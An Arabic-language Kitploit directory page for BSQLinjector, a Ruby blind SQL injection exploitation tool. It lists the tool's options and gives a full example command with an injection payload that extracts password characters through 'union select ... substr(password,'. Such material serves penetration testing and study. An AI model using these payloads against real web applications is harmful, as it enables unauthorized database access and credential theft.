Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
BSQLinjector — أداة استغلال حقن SQL الأعمى مكتوبة بلغة روبي. | Kitploit
أدوات/GitHubGitHub/enjoiz/bsqlinjector
تحليل الثغرات الأمنيةاستغلال تطبيقات الويباختبار الاختراق
GitHubenjoiz/bsqlinjector

BSQLinjector

أداة استغلال حقن SQL الأعمى مكتوبة بلغة روبي.

عرض المستودع
10027منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

BSQLinjector

يستخدم BSQLinjector الطريقة العمياء لاسترجاع البيانات من قواعد بيانات SQL. أوصي باستخدام المفتاح "--test" لرؤية كيف يبدو الحمولة المُعدّلة قبل إرسالها إلى التطبيق.

الخيارات:

root@kitploit:~
  --file	    إلزامي - ملف يحتوي على طلب HTTP صالح ونقطة حقن SQL (SQLINJECT). (--file=/tmp/req.txt)
  --pattern	    إلزامي - النمط الذي سيتم البحث عنه عندما يكون الاستعلام صحيحًا. (--pattern=truestatement)
  --prepend	    إلزامي - الحمولة الرئيسية. (--prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,"
  --append	    كيفية إنهاء الحمولة. مثلاً تعليق باقي جملة SQL. (--append='#)
  --schar	    حرف يوضع حول الأحرف. لا يُستخدم هذا الحرف في الوضع السداسي. (--schar="'")
  --2ndfile	    ملف يحتوي على طلب HTTP صالح يُستخدم في استغلال من الدرجة الثانية. (--2ndfile=/tmp/2ndreq.txt)

  --mode	    وضع الاستعلام الأعمى المستخدم - (between - b (يولد عدد أقل من الطلبات), moreless - a (يولد عدد أقل من الطلبات باستخدام الأحرف "<", ">", "="), like - l (هجوم شامل), equals - e (هجوم شامل)). (--mode=l)
  --postgres        استخدم "for" من PostgreSQL في دالة substring (مثال: from 1 for 1).
  --hex		    استخدم النظام السداسي للمقارنة بدلاً من الأحرف.
  --case	    حساسية حالة الأحرف.

  --ssl		    استخدم SSL.
  --proxy	    الوكيل المستخدم. (--proxy=127.0.0.1:8080)

  --test	    تفعيل وضع الاختبار. لا يتم إرسال الطلب، فقط عرض الحمولة كاملة.
  --special	    تضمين جميع الأحرف الخاصة في التعداد.
  --start	    بدء التعداد من حرف محدد. (--start=10)
  --max		    أقصى عدد من الأحرف للتعداد. (--max=10)
  --timeout	    مهلة انتظار الردود. (--timeout=20)
  --only-final	    إيقاف عرض كل حرف تم تعداده.
  --comma	    تشفير الفاصلة.
  --bracket	    إضافة أقواس إلى نهاية دالة substring. --bracket="))"
  --hexspace	    استخدام مسافة بدلاً من الأقواس لفصل القيم السداسية.
  --verbose	    عرض رسائل تفصيلية.

مثال الاستخدام:

root@kitploit:~
  ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl

إخلاء مسؤولية

يحتوي هذا المستودع على أداة تم تطويرها لأغراض تعليمية بحتة. أي استخدام خاطئ للأداة في أنشطة غير قانونية محظور تمامًا.

إشعار قانوني

من المهم فهم جميع القوانين واللوائح المحلية المتعلقة بالأمن السيبراني والاختراق الأخلاقي والامتثال لها. الوصول غير المصرح به إلى أنظمة الكمبيوتر أو الشبكات أو البيانات غير قانوني ويعاقب عليه القانون. مطور هذا المستودع غير مسؤول عن أي استخدام خاطئ للأدوات الواردة فيه.

باستخدام الأدوات في هذا المستودع، فإنك توافق على استخدامها بمسؤولية وأخلاقية. احصل دائمًا على إذن صريح قبل اختبار أو محاولة الوصول إلى أي شبكة أو نظام أو بيانات لا تخصك.

تنزيل الأداة